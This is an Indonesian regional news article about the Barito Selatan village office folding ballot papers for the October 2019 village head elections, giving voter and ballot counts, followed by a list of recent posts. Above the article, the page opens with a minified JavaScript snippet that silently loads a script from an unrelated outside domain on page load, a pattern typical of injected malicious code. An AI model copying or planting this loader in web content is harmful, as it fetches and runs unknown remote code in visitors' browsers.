(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');

DSPMD Barsel Mulai Pelipatan Surat Suara Pilkades Serentak


BUNTOK, Dinas Sosial Pemberdayaan Masyarakat dan Desa (DSPMD) Barito Selatan (Barsel) mulai melakukan pelipatan surat suara untuk Pemilihan Kepala Desa (Pilkades) serentak  pada Oktober 2019 mendatang.

Sekretaris DSPMD Barsel Haitami mengatakan, dari 86 desa di Barsel sebanyak 62 desa yang melaksanakan Pilkades serentak, sisanya 24 desa masa jabatan kades belum berakhir.

Saat ini pihaknya sudah mulai melakukan pelipatan surat suara untuk  tahapan pelaksanaan Pilkades serentak pada Oktober mendatang.

“Kita sedang melakukan pelipatan surat suara, sesuai dengan jadwal dan tahapan,” kata Haitami kepada Kanalkalimantan.com, Rabu (18/9).

Dijelaskannya, surat suara yang sudah masuk ke DSPMD sebanyak 20 desa dengan jumlah surat suara sebanyak 13.988. Sementara sore Rabu surat suara dari 15 desa akan masuk lagi dari percetakan di Palangkaraya.

Sampai sore nanti, sebanyak 35 desa surat suara telah masuk dan dilakukan pelipatan. Sementara  27 desa menunggu proses percetakan surat suaranya.

“Kita optimis sesuai jadwal 30 September 2019 pelipatan ini sudah selesai dan siap didistribusikan ke semua desa yang melaksanakan Pilkades serentak,” ujar Haitami.

Ia mengungkapkan, untuk jumlah Daftar Pemilih Tetap (DPT) dari  62 desa sebanyak 44.659 ditambah surat  suara cadangan 768 jadi jumlah semua surat suara 45.427 lembar.

Selama pelipatan, belum ada ditemukan surat suara rusak, hanya saja ada salah satu desa yang kurang 10 lembar surat suara. “Namun kekurangan tersebut telah kita tambah sehingga semuanya lengkap,” pungkas Haitami. (digdo)

Reporter : Digdo
Editor : Bie

 


Desy Arfianty

Recent Posts

DPRD Banjarbaru Target Tiga Raperda Inisiatif Selesai Dalam Tiga Bulan

KANALKALIMANTAN.COM, BANJARBARU - Tiga buah Rancangan Peraturan Daerah (Raperda) inisiatif ditargetkan selesai dalam waktu tiga… Read More

1 jam ago

Berbaur dengan Masyarakat, Bupati dan Wabup Banjar Nobar Indonesia Vs Uzbekistan

KANALKALIMANTAN.COM, MARTAPURA - Alun-alun Ratu Zalecha, Martapura dipilih menjadi tempat nonton bareng (nobar) Semi Final… Read More

5 jam ago

Diakhiri Nobar Timnas, Pj Bupati Kapuas Menutup Expo Kapuas 2024

KANALKALIMANTAN.COM, KUALA KAPUAS - Penjabat (Pj) Bupati Kapuas Erlin Hardi secara resmi menutup gelaran Expo… Read More

8 jam ago

Bingkisan Kebahagiaan PLN untuk Warga Kalsel yang Membutuhkan

KANALKALIMANTAN.COM, BANJARBARU - PT PLN (Persero) Unit Induk Penyaluran dan Pusat Pengatur (UIP3B) Kalimantan melalui… Read More

8 jam ago

Asa Warga Banjarmasin Timnas Indonesia Masuk Olimpiade Paris 2024

KANALKALIMANTAN.COM, BANJARMASIN - Nonton bareng (Nobar) laga semifinal AFC U-23 Indonesia vs Uzbekistan di halaman… Read More

8 jam ago

Ini Tiga Rekor Muri Sebagai Kado HUT ke-73 Kabupaten Kapuas

KANALKALIMANTAN.COM, KUALA KAPUAS – Tiga rekor Museum Rekor Indonesia (Muri) menjadi catatan kado Hari Jadi… Read More

8 jam ago

This website uses cookies.